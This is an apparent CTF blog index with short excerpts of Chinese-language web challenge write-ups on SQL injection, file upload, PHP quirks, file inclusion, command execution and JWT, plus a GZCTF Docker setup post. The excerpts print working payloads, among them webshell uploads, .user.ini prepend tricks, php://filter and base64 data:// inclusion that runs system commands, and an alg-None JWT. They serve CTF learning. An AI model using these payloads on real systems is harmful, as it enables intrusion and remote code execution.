ctf-sql注入 前言:sql算是最不熟悉的了,写的稍微详细一点吧,目前的ctf赛题是不会出一把梭的题目,实战环境sqlmap可以多用用,题目尽量还是手写。 web17111' or 1=1--+ 123根据id = '".$ GET['id']."' limit 1;";传入的内容拼接就相当于id='1' or 2024-09-23 每日一题 #sql注入
ctfshow文件上传 web1510x01测试了一下需要png结尾,传个一句话木马上传之后bp抓包改为php,然后执行就行了,或者蚁剑 0x02前端js进行修改,把对应的png改成php即可 web152参照web151的0x01 web153这题直接改结尾不能成功,尝试htaccess之后发现不行,查阅之后发现前者只适合apache,这里使.user.ini 12GIF89aauto_prepend_file=sh 2024-09-20 每日一题 #文件上传
ctfshow-php特性 web891?num[]=a web900x011?num=4476.11 0x021?num=+4476 0x031?num=4476e1 0x041?num=0x117c web911?cmd=%0aphp web920x011?num=4476.11 0x021?num=4476e1 web920x011?num=4476.11 0x021?num=010574 web9 2024-09-17 每日一题 #php特性
ctfshow文件包含 前言:炒冷饭也不失一种乐趣。 web781?file=php://filter/convert.base64-encode/resource=flag.php web791?file=data://text/plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4= 原理就是将`进行base64写进去执行 web800x011?f 2024-09-13 每日一题 #文件包含
ctfshow命令执行 前言:用了几天晚上时间把题目都过了一下,还是有值得学习的地方,炒冷饭也不失一种乐趣。web119-122的题目由于直接上传原文会对hexo的渲染模板可能造成模板注入,所以迫不得已上传的png web290x011?c=system("tac f*"); 0x021?c=echo `tac f*`; web301?c=echo `tac f*`; web311?c=echo 2024-09-11 每日一题 #命令执行
ctfshow-jwt 题目web345打开查看页面源码提示/admin/,抓包看看有没有东西,发现是jwt,放jwt.io里看一下没有加密方式,那就是简单的base64进行转化,这里利用hackerbar进行发包 1{"alg":"None","typ":"jwt"}[{"iss& 2024-09-07 每日一题 #jwt
2019ciscn-ikun 题目在线靶场 一个生成的网站,有提示需要买到Lv6,然后就没有然后了 分析下面有很多Lv2-Lv5的,可以尝试写个脚本找到网页 点击图片看名称,src="/static/img/lv/lv3.png"写脚本爆一下看看哪页有lv6.png的内容 12345678import requestsurl = "http://c66eb3e7-b146-49bb-b9c7-e5 2024-09-04 每日一题 #jwt #pickle
XGCTF-Ezzz_php 题目在线靶场 1234567891011121314151617181920212223242526272829303132 <?php highlight_file(__FILE__);error_reporting(0);function substrstr($data){ $start = mb_strpos($data, "["); $end 2024-09-03 每日一题 #serialize
2023ciscn-Unzip 前言:😋,看到好友包师傅每日一题,我也打算开个每日一题,记录一下内容。 题目[在线靶场][https://ctf.show/challenges#Unzip-4002] 初始界面是一个文件上传,随手上传一个一句话木马,进入页面。 12345678910 <?phperror_reporting(0);highlight_file(__FILE__);$finfo = finfo_open( 2024-09-02 每日一题 #文件上传
记一次GZCTF搭建及动态容器 前言:因为学校需要招新生要搭建平台,简单的学习了一下。 GZCTF配置环境 ubuntu 22.04 第一步更新源 1sudo apt update 第二步安装docker和docker-compose 1sudo apt install docker.io docker-compose 中途按Y和Enter即可。 第三步docker换源 由于docker今年在中国地区的限制,需要换源才能 2024-09-02 杂谈 #docker